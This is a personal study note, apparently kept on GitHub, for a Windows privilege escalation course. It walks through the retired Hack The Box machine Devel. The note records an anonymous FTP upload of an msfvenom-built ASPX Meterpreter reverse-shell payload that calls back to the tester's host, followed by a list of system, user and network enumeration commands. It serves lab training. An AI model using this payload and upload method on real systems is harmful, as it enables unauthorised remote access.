Skip to content

Latest commit

 

History

History
213 lines (131 loc) · 3.39 KB

Windows Privilege Escalation for Beginners.md

File metadata and controls

213 lines (131 loc) · 3.39 KB

(30May23Tue)

Windows Privilege Escalation for Beginners | TCM Security, Inc.

Windows Privilege Escalation for Beginners - YouTube

FuzzySecurity | Windows Privilege Escalation Fundamentals

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThings

Windows Privilege Escalation Guide

Privilege Escalation - Windows · Total OSCP Guide

Gaining a Foothold

https://app.hackthebox.com/machines/3

Devel (EASY - RETIRED)

sudo nmap -A -T4 -p- 10.129.234.141

![[Pasted image 20230530170427.png]]

echo "this is a test" > test.txt

![[Pasted image 20230530164800.png]]

ftp 10.129.234.141

anonymous : anonymous

put test.txt

![[Pasted image 20230530170808.png]]

http://10.129.234.141/test.txt

![[Pasted image 20230530170845.png]]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > exploit.aspx

![[Pasted image 20230530171010.png]]

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

![[Pasted image 20230530171632.png]]

![[Pasted image 20230530171753.png]]

![[Pasted image 20230530171849.png]]

![[Pasted image 20230530171931.png]]

Initial Enumeration

Initial Enumeration System Enumeration

getuid

sysinfo

![[Pasted image 20230530172139.png]]

pwd

shell

systeminfo

![[Pasted image 20230530172652.png]]

![[Pasted image 20230530172758.png]]

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

![[Pasted image 20230530173134.png]]

hostname

wmic qfe

![[Pasted image 20230530173421.png]]

WMIC - Windows Management Instrumentation Command

qfe - quick-fix engineering

Win32_QuickFixEngineering class - Win32 apps | Microsoft Learn

![[Screenshot 2023-05-30 175339.png]]

wmic qfe get Caption,Description,HotFixID,InstalledOn

![[Screenshot 2023-05-30 180311.png]]

wmic logicaldisk

![[Screenshot 2023-05-30 181225.png]]

wmic logicaldisk get caption,description,providername

![[Pasted image 20230530181515.png]]

Initial Enumeration User Enumeration

whomi

whoami /priv

![[Pasted image 20230530181813.png]]

whoami /groups

![[Pasted image 20230530182003.png]]

net user

![[Pasted image 20230530182557.png]]

net user babis

![[Pasted image 20230530182638.png]]

net user Administrator

![[Pasted image 20230530182831.png]]

net localgroup

net localgroup administrators

![[Pasted image 20230530183242.png]]

Initial Enumeration Network Enumeration

ipconfig /all

![[Pasted image 20230530183606.png]]

arp -a

![[Pasted image 20230530183757.png]]

route print

![[Pasted image 20230530184008.png]]

netstat -ano

![[Pasted image 20230530184353.png]]

Initial Enumeration Password Hunting